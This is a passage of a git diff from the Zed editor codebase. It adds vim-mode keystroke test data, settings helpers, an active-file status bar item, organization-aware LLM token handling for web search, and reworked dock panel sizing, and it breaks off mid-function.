+{"Put":{"state":"ˇhello\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"p"} +{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}} +{"Key":"."} +{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\nfour\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"_"} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"p"} +{"Get":{"state":"one\nfour\nˇone\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"one\ntwo\ntwo\nˇtwo\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"d"} +{"Key":"d"} +{"Key":"\""} +{"Key":"b"} +{"Key":"."} +{"Get":{"state":"ˇthree\n","mode":"Normal"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"\""} +{"Key":"b"} +{"Key":"p"} +{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\nfour\nfive\nsix\nseven\neight\nnine\nten\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"ˇ","mode":"Normal"}} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"\nten\nnine\neight\nseven\nsix\nfive\nfour\nthree\ntwo\nˇtwo","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}} +{"Put":{"state":"one\ntwo\nˇthree\n"}} +{"Key":"\""} +{"Key":"2"} +{"Key":"y"} +{"Key":"y"} +{"Key":"k"} +{"Key":"k"} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"y"} +{"Key":"y"} +{"Key":"k"} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} 
+{"Get":{"state":"one\ntwo\nthree\none\nˇone\ntwo\nthree\n","mode":"Normal"}} diff --git a/crates/vim/test_data/test_matching_comments.json b/crates/vim/test_data/test_matching_comments.json new file mode 100644 index 0000000000000000000000000000000000000000..7fcf5e46e1ea16f2be794ff76b583242b33aabc0 --- /dev/null +++ b/crates/vim/test_data/test_matching_comments.json @@ -0,0 +1,10 @@ +{"Put":{"state":"ˇ/*\n this is a comment\n*/"}} +{"Key":"%"} +{"Get":{"state":"/*\n this is a comment\nˇ*/","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"ˇ/*\n this is a comment\n*/","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"/*\n this is a comment\nˇ*/","mode":"Normal"}} +{"Put":{"state":"ˇ// comment"}} +{"Key":"%"} +{"Get":{"state":"ˇ// comment","mode":"Normal"}} diff --git a/crates/vim/test_data/test_matching_preprocessor_directives.json b/crates/vim/test_data/test_matching_preprocessor_directives.json new file mode 100644 index 0000000000000000000000000000000000000000..9f0bd9792ee8dad5029f4ecaf325c231755530e1 --- /dev/null +++ b/crates/vim/test_data/test_matching_preprocessor_directives.json @@ -0,0 +1,18 @@ +{"Put":{"state":"#ˇif\n\n#else\n\n#endif\n"}} +{"Key":"%"} +{"Get":{"state":"#if\n\nˇ#else\n\n#endif\n","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"#if\n\n#else\n\nˇ#endif\n","mode":"Normal"}} +{"Key":"%"} +{"Get":{"state":"ˇ#if\n\n#else\n\n#endif\n","mode":"Normal"}} +{"Put":{"state":"#ˇif\n #if\n\n #else\n\n #endif\n\n#else\n#endif\n"}} +{"Key":"%"} +{"Get":{"state":"#if\n #if\n\n #else\n\n #endif\n\nˇ#else\n#endif\n","mode":"Normal"}} +{"Key":"%"} +{"Key":"%"} +{"Get":{"state":"ˇ#if\n #if\n\n #else\n\n #endif\n\n#else\n#endif\n","mode":"Normal"}} +{"Key":"j"} +{"Key":"%"} +{"Key":"%"} +{"Key":"%"} +{"Get":{"state":"#if\n ˇ#if\n\n #else\n\n #endif\n\n#else\n#endif\n","mode":"Normal"}} diff --git a/crates/vim/test_data/test_visual_block_insert_after_ctrl_d_scroll.json b/crates/vim/test_data/test_visual_block_insert_after_ctrl_d_scroll.json new file mode 100644 
index 0000000000000000000000000000000000000000..ddad34e9ad6b11d5f29670f46903e6daf4082215 --- /dev/null +++ b/crates/vim/test_data/test_visual_block_insert_after_ctrl_d_scroll.json @@ -0,0 +1,10 @@ +{"SetOption":{"value":"scrolloff=3"}} +{"SetOption":{"value":"lines=7"}} +{"Put":{"state":"ˇ01\n02\n03\n04\n05\n06\n07\n08\n09\n10\n"}} +{"Key":"ctrl-v"} +{"Key":"ctrl-d"} +{"Get":{"state":"«0ˇ»1\n«0ˇ»2\n«0ˇ»3\n«0ˇ»4\n«0ˇ»5\n06\n07\n08\n09\n10\n","mode":"VisualBlock"}} +{"Key":"shift-i"} +{"Key":"x"} +{"Key":"escape"} +{"Get":{"state":"ˇx01\nx02\nx03\nx04\nx05\n06\n07\n08\n09\n10\n","mode":"Normal"}} diff --git a/crates/vim_mode_setting/Cargo.toml b/crates/vim_mode_setting/Cargo.toml index 0ae75d9d55136a499492893afdf14398073c6df3..6306d125b27a5342a61f503520692c099ab9c4f6 100644 --- a/crates/vim_mode_setting/Cargo.toml +++ b/crates/vim_mode_setting/Cargo.toml @@ -12,4 +12,5 @@ workspace = true path = "src/vim_mode_setting.rs" [dependencies] +gpui.workspace = true settings.workspace = true diff --git a/crates/vim_mode_setting/src/vim_mode_setting.rs b/crates/vim_mode_setting/src/vim_mode_setting.rs index e229913a80b0bedcd4ef7b872f1559b98c803d0c..cb9ab03785c9e00459733c62f1b524cea422bfa1 100644 --- a/crates/vim_mode_setting/src/vim_mode_setting.rs +++ b/crates/vim_mode_setting/src/vim_mode_setting.rs @@ -4,6 +4,7 @@ //! disable Vim/Helix modes without having to depend on the `vim` crate in its //! entirety. 
+use gpui::App; use settings::{RegisterSetting, Settings, SettingsContent}; #[derive(RegisterSetting)] @@ -15,9 +16,25 @@ impl Settings for VimModeSetting { } } +impl VimModeSetting { + pub fn is_enabled(cx: &App) -> bool { + Self::try_get(cx) + .map(|vim_mode| vim_mode.0) + .unwrap_or(false) + } +} + #[derive(RegisterSetting)] pub struct HelixModeSetting(pub bool); +impl HelixModeSetting { + pub fn is_enabled(cx: &App) -> bool { + Self::try_get(cx) + .map(|helix_mode| helix_mode.0) + .unwrap_or(false) + } +} + impl Settings for HelixModeSetting { fn from_settings(content: &SettingsContent) -> Self { Self(content.helix_mode.unwrap()) diff --git a/crates/watch/Cargo.toml b/crates/watch/Cargo.toml index 9d77eaeddec66a08dd2e9d5056249671c9b02670..aea8b0bbbda7d53d17400553407eceb7cb8253b2 100644 --- a/crates/watch/Cargo.toml +++ b/crates/watch/Cargo.toml @@ -19,5 +19,4 @@ parking_lot.workspace = true ctor.workspace = true futures.workspace = true gpui = { workspace = true, features = ["test-support"] } -rand.workspace = true zlog.workspace = true diff --git a/crates/web_search_providers/Cargo.toml b/crates/web_search_providers/Cargo.toml index ecdca5883ff541459e94170986df3b7f16036c5a..ff264edcb150063237c633de746b2f6b9f6f250c 100644 --- a/crates/web_search_providers/Cargo.toml +++ b/crates/web_search_providers/Cargo.toml @@ -14,6 +14,7 @@ path = "src/web_search_providers.rs" [dependencies] anyhow.workspace = true client.workspace = true +cloud_api_types.workspace = true cloud_llm_client.workspace = true futures.workspace = true gpui.workspace = true diff --git a/crates/web_search_providers/src/cloud.rs b/crates/web_search_providers/src/cloud.rs index 2f3ccdbb52a884471250ad458e8b7922437cb9ae..11227d8fb5c7152dc5b7e03b95fadea6cb714717 100644 --- a/crates/web_search_providers/src/cloud.rs +++ b/crates/web_search_providers/src/cloud.rs @@ -1,12 +1,13 @@ use std::sync::Arc; use anyhow::{Context as _, Result}; -use client::Client; +use client::{Client, NeedsLlmTokenRefresh, 
UserStore, global_llm_token}; +use cloud_api_types::OrganizationId; use cloud_llm_client::{WebSearchBody, WebSearchResponse}; use futures::AsyncReadExt as _; -use gpui::{App, AppContext, Context, Entity, Subscription, Task}; +use gpui::{App, AppContext, Context, Entity, Task}; use http_client::{HttpClient, Method}; -use language_model::{LlmApiToken, NeedsLlmTokenRefresh, RefreshLlmTokenListener}; +use language_model::LlmApiToken; use web_search::{WebSearchProvider, WebSearchProviderId}; pub struct CloudWebSearchProvider { @@ -14,8 +15,8 @@ pub struct CloudWebSearchProvider { } impl CloudWebSearchProvider { - pub fn new(client: Arc, cx: &mut App) -> Self { - let state = cx.new(|cx| State::new(client, cx)); + pub fn new(client: Arc, user_store: Entity, cx: &mut App) -> Self { + let state = cx.new(|cx| State::new(client, user_store, cx)); Self { state } } @@ -23,29 +24,18 @@ impl CloudWebSearchProvider { pub struct State { client: Arc, + user_store: Entity, llm_api_token: LlmApiToken, - _llm_token_subscription: Subscription, } impl State { - pub fn new(client: Arc, cx: &mut Context) -> Self { - let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx); + pub fn new(client: Arc, user_store: Entity, cx: &mut Context) -> Self { + let llm_api_token = global_llm_token(cx); Self { client, - llm_api_token: LlmApiToken::default(), - _llm_token_subscription: cx.subscribe( - &refresh_llm_token_listener, - |this, _, _event, cx| { - let client = this.client.clone(); - let llm_api_token = this.llm_api_token.clone(); - cx.spawn(async move |_this, _cx| { - llm_api_token.refresh(&client).await?; - anyhow::Ok(()) - }) - .detach_and_log_err(cx); - }, - ), + user_store, + llm_api_token, } } } @@ -61,21 +51,31 @@ impl WebSearchProvider for CloudWebSearchProvider { let state = self.state.read(cx); let client = state.client.clone(); let llm_api_token = state.llm_api_token.clone(); + let organization_id = state + .user_store + .read(cx) + .current_organization() + 
.map(|organization| organization.id.clone()); let body = WebSearchBody { query }; - cx.background_spawn(async move { perform_web_search(client, llm_api_token, body).await }) + cx.background_spawn(async move { + perform_web_search(client, llm_api_token, organization_id, body).await + }) } } async fn perform_web_search( client: Arc, llm_api_token: LlmApiToken, + organization_id: Option, body: WebSearchBody, ) -> Result { const MAX_RETRIES: usize = 3; let http_client = &client.http_client(); let mut retries_remaining = MAX_RETRIES; - let mut token = llm_api_token.acquire(&client).await?; + let mut token = client + .acquire_llm_token(&llm_api_token, organization_id.clone()) + .await?; loop { if retries_remaining == 0 { @@ -100,7 +100,9 @@ async fn perform_web_search( response.body_mut().read_to_string(&mut body).await?; return Ok(serde_json::from_str(&body)?); } else if response.needs_llm_token_refresh() { - token = llm_api_token.refresh(&client).await?; + token = client + .refresh_llm_token(&llm_api_token, organization_id.clone()) + .await?; retries_remaining -= 1; } else { // For now we will only retry if the LLM token is expired, diff --git a/crates/web_search_providers/src/web_search_providers.rs b/crates/web_search_providers/src/web_search_providers.rs index 8ab0aee47a414c4cc669ab05e727a827d17c2844..509632429fb167cd489cd4253ceae0ce479b10a8 100644 --- a/crates/web_search_providers/src/web_search_providers.rs +++ b/crates/web_search_providers/src/web_search_providers.rs @@ -1,26 +1,28 @@ mod cloud; -use client::Client; +use client::{Client, UserStore}; use gpui::{App, Context, Entity}; use language_model::LanguageModelRegistry; use std::sync::Arc; use web_search::{WebSearchProviderId, WebSearchRegistry}; -pub fn init(client: Arc, cx: &mut App) { +pub fn init(client: Arc, user_store: Entity, cx: &mut App) { let registry = WebSearchRegistry::global(cx); registry.update(cx, |registry, cx| { - register_web_search_providers(registry, client, cx); + 
register_web_search_providers(registry, client, user_store, cx); }); } fn register_web_search_providers( registry: &mut WebSearchRegistry, client: Arc, + user_store: Entity, cx: &mut Context, ) { register_zed_web_search_provider( registry, client.clone(), + user_store.clone(), &LanguageModelRegistry::global(cx), cx, ); @@ -29,7 +31,13 @@ fn register_web_search_providers( &LanguageModelRegistry::global(cx), move |this, registry, event, cx| { if let language_model::Event::DefaultModelChanged = event { - register_zed_web_search_provider(this, client.clone(), ®istry, cx) + register_zed_web_search_provider( + this, + client.clone(), + user_store.clone(), + ®istry, + cx, + ) } }, ) @@ -39,6 +47,7 @@ fn register_web_search_providers( fn register_zed_web_search_provider( registry: &mut WebSearchRegistry, client: Arc, + user_store: Entity, language_model_registry: &Entity, cx: &mut Context, ) { @@ -47,7 +56,10 @@ fn register_zed_web_search_provider( .default_model() .is_some_and(|default| default.is_provided_by_zed()); if using_zed_provider { - registry.register_provider(cloud::CloudWebSearchProvider::new(client, cx), cx) + registry.register_provider( + cloud::CloudWebSearchProvider::new(client, user_store, cx), + cx, + ) } else { registry.unregister_provider(WebSearchProviderId( cloud::ZED_WEB_SEARCH_PROVIDER_ID.into(), diff --git a/crates/which_key/Cargo.toml b/crates/which_key/Cargo.toml index f53ba45dd71abc972ce23efb8871f485dfe47207..cafcc2306b89d805f3e02b70060e4bb23b3436ff 100644 --- a/crates/which_key/Cargo.toml +++ b/crates/which_key/Cargo.toml @@ -17,7 +17,7 @@ command_palette.workspace = true gpui.workspace = true serde.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/which_key/src/which_key.rs b/crates/which_key/src/which_key.rs index 70889c100f33020a3ceaa8af1ba8812d5e7d4adb..d71bd646e70a4ede6047bd88416ea9314bddf12d 100644 --- 
a/crates/which_key/src/which_key.rs +++ b/crates/which_key/src/which_key.rs @@ -61,12 +61,8 @@ pub fn init(cx: &mut App) { pub static FILTERED_KEYSTROKES: LazyLock>> = LazyLock::new(|| { [ // Modifiers on normal vim commands - "g h", "g j", "g k", - "g l", - "g $", - "g ^", // Duplicate keys with "ctrl" held, e.g. "ctrl-w ctrl-a" is duplicate of "ctrl-w a" "ctrl-w ctrl-a", "ctrl-w ctrl-c", diff --git a/crates/which_key/src/which_key_modal.rs b/crates/which_key/src/which_key_modal.rs index 238431b90a8eafdd0e085a3f109e8f812fbe709b..38b99207ea693b0cfc4113c4d4a4d70940090014 100644 --- a/crates/which_key/src/which_key_modal.rs +++ b/crates/which_key/src/which_key_modal.rs @@ -7,7 +7,7 @@ use gpui::{ }; use settings::Settings; use std::collections::HashMap; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Divider, DividerColor, DynamicSpacing, LabelSize, WithScrollbar, prelude::*, text_for_keystrokes, diff --git a/crates/workspace/Cargo.toml b/crates/workspace/Cargo.toml index dcd0bf640fdf279fb1874ba77307ccbd3c431393..42e64504f348a727d17d2538d06556497fba54df 100644 --- a/crates/workspace/Cargo.toml +++ b/crates/workspace/Cargo.toml @@ -14,7 +14,6 @@ doctest = false [features] test-support = [ - "call/test-support", "client/test-support", "http_client/test-support", "db/test-support", @@ -28,6 +27,7 @@ test-support = [ [dependencies] any_vec.workspace = true +agent_settings.workspace = true anyhow.workspace = true async-recursion.workspace = true client.workspace = true @@ -63,18 +63,18 @@ strum.workspace = true task.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true uuid.workspace = true +vim_mode_setting.workspace = true zed_actions.workspace = true [target.'cfg(target_os = "windows")'.dependencies] windows.workspace = true [dev-dependencies] -call = { workspace = true, features = ["test-support"] } client = { workspace = true, features = ["test-support"] } 
-dap = { workspace = true, features = ["test-support"] } db = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/workspace/src/active_file_name.rs b/crates/workspace/src/active_file_name.rs new file mode 100644 index 0000000000000000000000000000000000000000..f35312d529423c4dc81bb71dc585c99169afdd39 --- /dev/null +++ b/crates/workspace/src/active_file_name.rs @@ -0,0 +1,69 @@ +use gpui::{ + Context, Empty, EventEmitter, IntoElement, ParentElement, Render, SharedString, Window, +}; +use settings::Settings; +use ui::{Button, Tooltip, prelude::*}; +use util::paths::PathStyle; + +use crate::{StatusItemView, item::ItemHandle, workspace_settings::StatusBarSettings}; + +pub struct ActiveFileName { + project_path: Option, + full_path: Option, +} + +impl ActiveFileName { + pub fn new() -> Self { + Self { + project_path: None, + full_path: None, + } + } +} + +impl Render for ActiveFileName { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + if !StatusBarSettings::get_global(cx).show_active_file { + return Empty.into_any_element(); + } + + let Some(project_path) = self.project_path.clone() else { + return Empty.into_any_element(); + }; + + let tooltip_text = self + .full_path + .clone() + .unwrap_or_else(|| project_path.clone()); + + div() + .child( + Button::new("active-file-name-button", project_path) + .label_size(LabelSize::Small) + .tooltip(Tooltip::text(tooltip_text)), + ) + .into_any_element() + } +} + +impl EventEmitter for ActiveFileName {} + +impl StatusItemView for ActiveFileName { + fn set_active_pane_item( + &mut self, + active_pane_item: Option<&dyn ItemHandle>, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(item) = active_pane_item { + self.project_path = item + .project_path(cx) + .map(|path| path.path.display(PathStyle::local()).into_owned().into()); + self.full_path = 
item.tab_tooltip_text(cx); + } else { + self.project_path = None; + self.full_path = None; + } + cx.notify(); + } +} diff --git a/crates/workspace/src/dock.rs b/crates/workspace/src/dock.rs index 439c6df5ee45938368895a67834d57df695fde89..e58b4b59100c05085c93993370b85a788fc159ca 100644 --- a/crates/workspace/src/dock.rs +++ b/crates/workspace/src/dock.rs @@ -1,8 +1,10 @@ +use crate::focus_follows_mouse::FocusFollowsMouse as _; use crate::persistence::model::DockData; -use crate::{DraggedDock, Event, ModalLayer, Pane}; +use crate::{DraggedDock, Event, FocusFollowsMouse, ModalLayer, Pane, WorkspaceSettings}; use crate::{Workspace, status_bar::StatusItemView}; use anyhow::Context as _; use client::proto; +use db::kvp::KeyValueStore; use gpui::{ Action, AnyView, App, Axis, Context, Corner, Entity, EntityId, EventEmitter, FocusHandle, @@ -10,10 +12,13 @@ use gpui::{ Render, SharedString, StyleRefinement, Styled, Subscription, WeakEntity, Window, deferred, div, px, }; -use settings::SettingsStore; +use serde::{Deserialize, Serialize}; +use settings::{Settings, SettingsStore}; use std::sync::Arc; -use ui::{ContextMenu, Divider, DividerColor, IconButton, Tooltip, h_flex}; -use ui::{prelude::*, right_click_menu}; +use ui::{ + ContextMenu, CountBadge, Divider, DividerColor, IconButton, Tooltip, prelude::*, + right_click_menu, +}; use util::ResultExt as _; pub(crate) const RESIZE_HANDLE_SIZE: Pixels = px(6.); @@ -33,8 +38,24 @@ pub trait Panel: Focusable + EventEmitter + Render + Sized { fn position(&self, window: &Window, cx: &App) -> DockPosition; fn position_is_valid(&self, position: DockPosition) -> bool; fn set_position(&mut self, position: DockPosition, window: &mut Window, cx: &mut Context); - fn size(&self, window: &Window, cx: &App) -> Pixels; - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context); + fn default_size(&self, window: &Window, cx: &App) -> Pixels; + fn initial_size_state(&self, _window: &Window, _cx: &App) -> PanelSizeState { + 
PanelSizeState::default() + } + fn size_state_changed(&mut self, _window: &mut Window, _cx: &mut Context) {} + fn supports_flexible_size(&self) -> bool { + false + } + fn has_flexible_size(&self, _window: &Window, _cx: &App) -> bool { + false + } + fn set_flexible_size( + &mut self, + _flexible: bool, + _window: &mut Window, + _cx: &mut Context, + ) { + } fn icon(&self, window: &Window, cx: &App) -> Option; fn icon_tooltip(&self, window: &Window, cx: &App) -> Option<&'static str>; fn toggle_action(&self) -> Box; @@ -59,6 +80,9 @@ pub trait Panel: Focusable + EventEmitter + Render + Sized { fn enabled(&self, _cx: &App) -> bool { true } + fn is_agent_panel(&self) -> bool { + false + } } pub trait PanelHandle: Send + Sync { @@ -73,8 +97,12 @@ pub trait PanelHandle: Send + Sync { fn set_active(&self, active: bool, window: &mut Window, cx: &mut App); fn remote_id(&self) -> Option; fn pane(&self, cx: &App) -> Option>; - fn size(&self, window: &Window, cx: &App) -> Pixels; - fn set_size(&self, size: Option, window: &mut Window, cx: &mut App); + fn default_size(&self, window: &Window, cx: &App) -> Pixels; + fn initial_size_state(&self, window: &Window, cx: &App) -> PanelSizeState; + fn size_state_changed(&self, window: &mut Window, cx: &mut App); + fn supports_flexible_size(&self, cx: &App) -> bool; + fn has_flexible_size(&self, window: &Window, cx: &App) -> bool; + fn set_flexible_size(&self, flexible: bool, window: &mut Window, cx: &mut App); fn icon(&self, window: &Window, cx: &App) -> Option; fn icon_tooltip(&self, window: &Window, cx: &App) -> Option<&'static str>; fn toggle_action(&self, window: &Window, cx: &App) -> Box; @@ -83,6 +111,7 @@ pub trait PanelHandle: Send + Sync { fn to_any(&self) -> AnyView; fn activation_priority(&self, cx: &App) -> u32; fn enabled(&self, cx: &App) -> bool; + fn is_agent_panel(&self, cx: &App) -> bool; fn move_to_next_position(&self, window: &mut Window, cx: &mut App) { let current_position = self.position(window, cx); let 
next_position = [ @@ -148,12 +177,28 @@ where T::remote_id() } - fn size(&self, window: &Window, cx: &App) -> Pixels { - self.read(cx).size(window, cx) + fn default_size(&self, window: &Window, cx: &App) -> Pixels { + self.read(cx).default_size(window, cx) + } + + fn initial_size_state(&self, window: &Window, cx: &App) -> PanelSizeState { + self.read(cx).initial_size_state(window, cx) } - fn set_size(&self, size: Option, window: &mut Window, cx: &mut App) { - self.update(cx, |this, cx| this.set_size(size, window, cx)) + fn size_state_changed(&self, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| this.size_state_changed(window, cx)) + } + + fn supports_flexible_size(&self, cx: &App) -> bool { + self.read(cx).supports_flexible_size() + } + + fn has_flexible_size(&self, window: &Window, cx: &App) -> bool { + self.read(cx).has_flexible_size(window, cx) + } + + fn set_flexible_size(&self, flexible: bool, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| this.set_flexible_size(flexible, window, cx)) } fn icon(&self, window: &Window, cx: &App) -> Option { @@ -187,6 +232,10 @@ where fn enabled(&self, cx: &App) -> bool { self.read(cx).enabled(cx) } + + fn is_agent_panel(&self, cx: &App) -> bool { + self.read(cx).is_agent_panel() + } } impl From<&dyn PanelHandle> for AnyView { @@ -204,6 +253,7 @@ pub struct Dock { is_open: bool, active_panel_index: Option, focus_handle: FocusHandle, + focus_follows_mouse: FocusFollowsMouse, pub(crate) serialized_dock: Option, zoom_layer_open: bool, modal_layer: Entity, @@ -260,8 +310,16 @@ impl DockPosition { } } +#[derive(Clone, Copy, Debug, Default, PartialEq, Serialize, Deserialize)] +pub struct PanelSizeState { + pub size: Option, + #[serde(default)] + pub flex: Option, +} + struct PanelEntry { panel: Arc, + size_state: PanelSizeState, _subscriptions: [Subscription; 3], } @@ -270,6 +328,27 @@ pub struct PanelButtons { _settings_subscription: Subscription, } +pub(crate) const PANEL_SIZE_STATE_KEY: &str = 
"dock_panel_size"; + +fn resize_panel_entry( + position: DockPosition, + entry: &mut PanelEntry, + size: Option, + flex: Option, + window: &mut Window, + cx: &mut App, +) -> (&'static str, PanelSizeState) { + let size = size.map(|size| size.max(RESIZE_HANDLE_SIZE).round()); + let use_flex = entry.panel.has_flexible_size(window, cx) && position.axis() == Axis::Horizontal; + if use_flex { + entry.size_state.flex = flex; + } else { + entry.size_state.size = size; + } + entry.panel.size_state_changed(window, cx); + (entry.panel.panel_key(), entry.size_state) +} + impl Dock { pub fn new( position: DockPosition, @@ -299,6 +378,7 @@ impl Dock { active_panel_index: None, is_open: false, focus_handle: focus_handle.clone(), + focus_follows_mouse: WorkspaceSettings::get_global(cx).focus_follows_mouse, _subscriptions: [focus_subscription, zoom_subscription], serialized_dock: None, zoom_layer_open: false, @@ -491,20 +571,37 @@ impl Dock { return; }; + let panel_id = Entity::entity_id(&panel); let was_visible = this.is_open() - && this.visible_panel().is_some_and(|active_panel| { - active_panel.panel_id() == Entity::entity_id(&panel) - }); - - this.remove_panel(&panel, window, cx); + && this + .visible_panel() + .is_some_and(|active_panel| active_panel.panel_id() == panel_id); + let size_state = this + .panel_entries + .iter() + .find(|entry| entry.panel.panel_id() == panel_id) + .map(|entry| entry.size_state) + .unwrap_or_default(); + + let previous_axis = this.position.axis(); + let next_axis = new_position.axis(); + let size_state = if previous_axis == next_axis { + size_state + } else { + PanelSizeState::default() + }; - new_dock.update(cx, |new_dock, cx| { - new_dock.remove_panel(&panel, window, cx); - }); + if !this.remove_panel(&panel, window, cx) { + // Panel was already moved from this dock + return; + } new_dock.update(cx, |new_dock, cx| { let index = new_dock.add_panel(panel.clone(), workspace.clone(), window, cx); + if let Some(added_panel) = 
new_dock.panel_for_id(panel_id).cloned() { + new_dock.set_panel_size_state(added_panel.as_ref(), size_state, cx); + } if was_visible { new_dock.set_open(true, window, cx); new_dock.activate_panel(index, window, cx); @@ -595,10 +692,13 @@ impl Dock { { *active_index += 1; } + let size_state = panel.read(cx).initial_size_state(window, cx); + self.panel_entries.insert( index, PanelEntry { panel: Arc::new(panel.clone()), + size_state, _subscriptions: subscriptions, }, ); @@ -670,6 +770,12 @@ impl Dock { self.panel_entries.len() } + pub fn has_agent_panel(&self, cx: &App) -> bool { + self.panel_entries + .iter() + .any(|entry| entry.panel.is_agent_panel(cx)) + } + pub fn activate_panel(&mut self, panel_ix: usize, window: &mut Window, cx: &mut Context) { if Some(panel_ix) != self.active_panel_index { if let Some(active_panel) = self.active_panel_entry() { @@ -712,32 +818,129 @@ impl Dock { } } - pub fn panel_size(&self, panel: &dyn PanelHandle, window: &Window, cx: &App) -> Option { + pub fn active_panel_size(&self) -> Option { + if self.is_open { + self.active_panel_entry().map(|entry| entry.size_state) + } else { + None + } + } + + pub fn stored_panel_size( + &self, + panel: &dyn PanelHandle, + window: &Window, + cx: &App, + ) -> Option { + self.panel_entries + .iter() + .find(|entry| entry.panel.panel_id() == panel.panel_id()) + .map(|entry| { + entry + .size_state + .size + .unwrap_or_else(|| entry.panel.default_size(window, cx)) + }) + } + + pub fn stored_panel_size_state(&self, panel: &dyn PanelHandle) -> Option { self.panel_entries .iter() .find(|entry| entry.panel.panel_id() == panel.panel_id()) - .map(|entry| entry.panel.size(window, cx)) + .map(|entry| entry.size_state) } - pub fn active_panel_size(&self, window: &Window, cx: &App) -> Option { + pub fn stored_active_panel_size(&self, window: &Window, cx: &App) -> Option { if self.is_open { - self.active_panel_entry() - .map(|entry| entry.panel.size(window, cx)) + self.active_panel_entry().map(|entry| { + entry 
+ .size_state + .size + .unwrap_or_else(|| entry.panel.default_size(window, cx)) + }) } else { None } } + pub fn set_panel_size_state( + &mut self, + panel: &dyn PanelHandle, + size_state: PanelSizeState, + cx: &mut Context, + ) -> bool { + if let Some(entry) = self + .panel_entries + .iter_mut() + .find(|entry| entry.panel.panel_id() == panel.panel_id()) + { + entry.size_state = size_state; + cx.notify(); + true + } else { + false + } + } + + pub fn toggle_panel_flexible_size( + &mut self, + panel: &dyn PanelHandle, + current_size: Option, + current_flex: Option, + window: &mut Window, + cx: &mut Context, + ) { + let Some(entry) = self + .panel_entries + .iter_mut() + .find(|entry| entry.panel.panel_id() == panel.panel_id()) + else { + return; + }; + let currently_flexible = entry.panel.has_flexible_size(window, cx); + if currently_flexible { + entry.size_state.size = current_size; + } else { + entry.size_state.flex = current_flex; + } + let panel_key = entry.panel.panel_key(); + let size_state = entry.size_state; + let workspace = self.workspace.clone(); + entry + .panel + .set_flexible_size(!currently_flexible, window, cx); + entry.panel.size_state_changed(window, cx); + cx.defer(move |cx| { + if let Some(workspace) = workspace.upgrade() { + workspace.update(cx, |workspace, cx| { + workspace.persist_panel_size_state(panel_key, size_state, cx); + }); + } + }); + cx.notify(); + } + pub fn resize_active_panel( &mut self, size: Option, + flex: Option, window: &mut Window, cx: &mut Context, ) { - if let Some(entry) = self.active_panel_entry() { - let size = size.map(|size| size.max(RESIZE_HANDLE_SIZE).round()); - - entry.panel.set_size(size, window, cx); + if let Some(index) = self.active_panel_index + && let Some(entry) = self.panel_entries.get_mut(index) + { + let (panel_key, size_state) = + resize_panel_entry(self.position, entry, size, flex, window, cx); + + let workspace = self.workspace.clone(); + cx.defer(move |cx| { + if let Some(workspace) = 
workspace.upgrade() { + workspace.update(cx, |workspace, cx| { + workspace.persist_panel_size_state(panel_key, size_state, cx); + }); + } + }); cx.notify(); } } @@ -745,13 +948,27 @@ impl Dock { pub fn resize_all_panels( &mut self, size: Option, + flex: Option, window: &mut Window, cx: &mut Context, ) { - for entry in &mut self.panel_entries { - let size = size.map(|size| size.max(RESIZE_HANDLE_SIZE).round()); - entry.panel.set_size(size, window, cx); - } + let size_states_to_persist: Vec<_> = self + .panel_entries + .iter_mut() + .map(|entry| resize_panel_entry(self.position, entry, size, flex, window, cx)) + .collect(); + + let workspace = self.workspace.clone(); + cx.defer(move |cx| { + if let Some(workspace) = workspace.upgrade() { + workspace.update(cx, |workspace, cx| { + for (panel_key, size_state) in size_states_to_persist { + workspace.persist_panel_size_state(panel_key, size_state, cx); + } + }); + } + }); + cx.notify(); } @@ -770,22 +987,47 @@ impl Dock { dispatch_context } - pub fn clamp_panel_size(&mut self, max_size: Pixels, window: &mut Window, cx: &mut App) { + pub fn clamp_panel_size(&mut self, max_size: Pixels, window: &Window, cx: &mut App) { let max_size = (max_size - 